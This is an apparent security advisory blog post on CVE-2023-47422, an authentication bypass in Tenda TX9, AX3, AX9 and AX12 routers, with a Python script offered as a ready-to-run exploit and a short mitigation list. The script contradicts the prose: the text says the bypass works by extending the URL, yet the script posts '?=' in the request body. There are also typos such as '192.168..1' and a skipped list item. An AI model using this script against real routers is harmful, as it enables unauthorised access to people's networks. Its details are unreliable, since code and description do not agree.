CVE-2023-47422 - Bypass Authentication in Tenda Routers via Access Control Issue

A significant security vulnerability has been discovered in multiple Tenda router models, specifically including Tenda TX9 V1 V22.03.02.54, Tenda AX3 V3 V16.03.12.11, Tenda AX9 V1 V22.03.01.46, and Tenda AX12 V1 V22.03.01.46. This vulnerability is categorized as an access control issue, which allows attackers to easily bypass authentication on any endpoint by using a specially crafted URL.

Exploit Details

This access control issue stems from the /usr/sbin/httpd binary in the affected Tenda router models. The vulnerability enables attackers to bypass the authentication mechanism simply by extending the URL with specific characters, thereby tricking the system into granting unauthorized access.

Here's a code snippet demonstrating the exploit

#!/usr/bin/python

import requests

# Replace <router_ip> with the IP address of the Tenda router
# and <endpoint> with the endpoint you want to access
url = "http://<router_ip>/<endpoint>?x=";

payload = "\x3F\x3D"

headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

This script uses the Python Requests library to send a POST request to the targeted Tenda router. Replace <router_ip> with the actual IP address of the targeted Tenda router (usually something like 192.168..1) and <endpoint> with the endpoint you want to access without authentication. You may also need to change the headers and data to match the expected format of the specific endpoint.

To execute the script, simply save it as a .py file and run it using Python

$ python bypass_auth.py

Implications and Severity

The consequences of exploiting this vulnerability can range from unauthorized access to the router's settings and sensitive information to modifying the entire network configuration, effectively causing denial of service (DoS) attacks or even taking control of the whole network.

Mitigation

As of now, there is no official patch provided by Tenda for this vulnerability. However, users of vulnerable Tenda routers are encouraged to take the following precautions:

1. Change the router's default IP address and admin credentials as soon as possible, making it harder for attackers to guess this information.
2. Implement a network-level firewall to isolate the router's administration interface from the outside world.

Disable remote access to the router's administration interface if it is not needed.

4. Keep an eye out for an official firmware update addressing this vulnerability and apply the patch as soon as it becomes available.

Original references

- CVE-2023-47422 details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47422
- Tenda router firmware versions: https://www.tendacn.com/us/download.html

Conclusion

In summary, CVE-2023-47422 is a critical access control issue affecting multiple Tenda router models. Users of vulnerable devices should take the necessary precautions outlined above to protect their networks until an official patch is released.

Timeline

Published on: 02/20/2024 22:15:08 UTC
Last modified on: 02/22/2024 19:07:37 UTC